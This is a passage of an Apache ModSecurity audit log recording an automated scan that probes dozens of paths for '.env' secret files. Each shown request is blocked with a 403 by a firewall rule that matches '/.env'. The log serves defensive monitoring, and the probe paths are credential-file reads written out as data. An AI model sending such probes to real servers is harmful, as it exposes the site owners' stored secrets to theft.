--dc826234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc826234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948684826146 664 (- - -) Stopwatch2: 1746948684826146 664; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc826234-Z-- --9490fd4a-A-- [11/May/2025:14:31:25 +0700] aCBSTU8xOExV7lPH_Dl_5QAAANM 103.236.140.4 54532 103.236.140.4 8181 --9490fd4a-B-- POST /development/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --9490fd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9490fd4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948685343856 797 (- - -) Stopwatch2: 1746948685343856 797; combined=309, p1=267, p2=0, p3=0, p4=0, p5=41, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9490fd4a-Z-- --991ff740-A-- [11/May/2025:14:31:25 +0700] aCBSTQpy530QiWmSS61dIwAAAEk 103.236.140.4 54534 103.236.140.4 8181 --991ff740-B-- GET /apps/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --991ff740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991ff740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948685969939 663 (- - -) Stopwatch2: 1746948685969939 663; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991ff740-Z-- --1ebdb770-A-- [11/May/2025:14:31:38 +0700] aCBSWgpy530QiWmSS61dJAAAAEg 103.236.140.4 54542 103.236.140.4 8181 --1ebdb770-B-- GET /private/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --1ebdb770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebdb770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948698163410 773 (- - -) Stopwatch2: 1746948698163410 773; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebdb770-Z-- --516d4b77-A-- [11/May/2025:14:31:43 +0700] aCBSXwpy530QiWmSS61dJQAAAFc 103.236.140.4 54544 103.236.140.4 8181 --516d4b77-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --516d4b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --516d4b77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948703941555 655 (- - -) Stopwatch2: 1746948703941555 655; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --516d4b77-Z-- --4272b22a-A-- [11/May/2025:14:31:50 +0700] aCBSZgpy530QiWmSS61dJgAAAFQ 103.236.140.4 54546 103.236.140.4 8181 --4272b22a-B-- GET /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --4272b22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4272b22a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948710596109 559 (- - -) Stopwatch2: 1746948710596109 559; combined=250, p1=225, p2=0, p3=0, p4=0, p5=25, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4272b22a-Z-- --fab73a27-A-- [11/May/2025:14:31:50 +0700] aCBSZkEuxCpmyy5aJPm7lQAAAAw 103.236.140.4 54548 103.236.140.4 8181 --fab73a27-B-- POST /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --fab73a27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab73a27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948710972780 677 (- - -) Stopwatch2: 1746948710972780 677; combined=260, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab73a27-Z-- --254e8602-A-- [11/May/2025:14:31:51 +0700] aCBSZwpy530QiWmSS61dJwAAAEc 103.236.140.4 54550 103.236.140.4 8181 --254e8602-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --254e8602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --254e8602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948711340852 785 (- - -) Stopwatch2: 1746948711340852 785; combined=301, p1=263, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --254e8602-Z-- --3ebb9f08-A-- [11/May/2025:14:31:51 +0700] aCBSZ0EuxCpmyy5aJPm7lgAAAAQ 103.236.140.4 54552 103.236.140.4 8181 --3ebb9f08-B-- POST /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --3ebb9f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ebb9f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948711683564 640 (- - -) Stopwatch2: 1746948711683564 640; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ebb9f08-Z-- --ee77e04a-A-- [11/May/2025:14:31:52 +0700] aCBSaE8xOExV7lPH_Dl_5gAAAM4 103.236.140.4 54554 103.236.140.4 8181 --ee77e04a-B-- GET /cms/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --ee77e04a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee77e04a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712028824 713 (- - -) Stopwatch2: 1746948712028824 713; combined=314, p1=247, p2=0, p3=0, p4=0, p5=66, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee77e04a-Z-- --0cbb4a50-A-- [11/May/2025:14:31:52 +0700] aCBSaApy530QiWmSS61dKAAAAFA 103.236.140.4 54556 103.236.140.4 8181 --0cbb4a50-B-- POST /cms/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --0cbb4a50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cbb4a50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712389714 689 (- - -) Stopwatch2: 1746948712389714 689; combined=274, p1=240, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cbb4a50-Z-- --97c7f662-A-- [11/May/2025:14:31:52 +0700] aCBSaApy530QiWmSS61dKQAAAFI 103.236.140.4 54558 103.236.140.4 8181 --97c7f662-B-- GET /script/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --97c7f662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97c7f662-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712805366 826 (- - -) Stopwatch2: 1746948712805366 826; combined=306, p1=269, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c7f662-Z-- --7f8f0f08-A-- [11/May/2025:14:31:53 +0700] aCBSaQpy530QiWmSS61dKgAAAEs 103.236.140.4 54562 103.236.140.4 8181 --7f8f0f08-B-- POST /script/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7f8f0f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f8f0f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948713215926 780 (- - -) Stopwatch2: 1746948713215926 780; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f8f0f08-Z-- --f90a6474-A-- [11/May/2025:14:32:00 +0700] aCBScObs1CLLACKj-_zQSwAAAJI 103.236.140.4 54566 103.236.140.4 8181 --f90a6474-B-- GET /application/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --f90a6474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f90a6474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948720297317 727 (- - -) Stopwatch2: 1746948720297317 727; combined=311, p1=277, p2=0, p3=0, p4=0, p5=34, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f90a6474-Z-- --4d85bb43-A-- [11/May/2025:14:32:00 +0700] aCBScE8xOExV7lPH_Dl_5wAAANY 103.236.140.4 54568 103.236.140.4 8181 --4d85bb43-B-- POST /application/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --4d85bb43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d85bb43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948720664527 656 (- - -) Stopwatch2: 1746948720664527 656; combined=264, p1=232, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d85bb43-Z-- --2c391033-A-- [11/May/2025:14:32:06 +0700] aCBSdubs1CLLACKj-_zQTAAAAIY 103.236.140.4 54574 103.236.140.4 8181 --2c391033-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --2c391033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c391033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948726172092 773 (- - -) Stopwatch2: 1746948726172092 773; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c391033-Z-- --a24c575e-A-- [11/May/2025:14:32:06 +0700] aCBSdubs1CLLACKj-_zQTQAAAIg 103.236.140.4 54576 103.236.140.4 8181 --a24c575e-B-- POST /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --a24c575e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a24c575e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948726534702 638 (- - -) Stopwatch2: 1746948726534702 638; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a24c575e-Z-- --8dc03178-A-- [11/May/2025:14:32:12 +0700] aCBSfEEuxCpmyy5aJPm7mAAAABM 103.236.140.4 54580 103.236.140.4 8181 --8dc03178-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --8dc03178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dc03178-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948732105646 889 (- - -) Stopwatch2: 1746948732105646 889; combined=367, p1=309, p2=0, p3=0, p4=0, p5=58, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dc03178-Z-- --d9870773-A-- [11/May/2025:14:32:18 +0700] aCBSggpy530QiWmSS61dKwAAAEU 103.236.140.4 54584 103.236.140.4 8181 --d9870773-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --d9870773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9870773-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948738643931 775 (- - -) Stopwatch2: 1746948738643931 775; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9870773-Z-- --751ded13-A-- [11/May/2025:14:32:29 +0700] aCBSjUEuxCpmyy5aJPm7mQAAAAY 103.236.140.4 54588 103.236.140.4 8181 --751ded13-B-- GET /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --751ded13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --751ded13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948749371671 889 (- - -) Stopwatch2: 1746948749371671 889; combined=350, p1=307, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751ded13-Z-- --c32ef254-A-- [11/May/2025:14:40:40 +0700] aCBUeEEuxCpmyy5aJPm7nQAAAAc 103.236.140.4 54628 103.236.140.4 8181 --c32ef254-B-- GET /.env HTTP/1.1 